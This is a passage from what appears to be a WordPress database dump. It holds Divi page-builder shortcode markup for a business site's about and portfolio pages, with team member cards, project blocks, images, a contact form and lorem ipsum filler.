_builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Eduard Ungureanu\" position=\"Project Manager\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-01.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-04 19:15:58','2020-08-04 19:15:58','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/04/392-revision-v1/',0,'revision','',0),(412,1,'2020-08-04 19:17:28','2020-08-04 19:17:28','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our work</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off%22\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Projects Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 01\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]01\r[/et_pb_text][et_pb_cta title=\"ABC - Corporate Branding\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 02\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]02\r[/et_pb_text][et_pb_cta title=\"Enkuber - App Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 03\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\" hover_enabled=\"0\"]03\r[/et_pb_text][et_pb_cta title=\"Iqra - Business Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 04\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"left\" 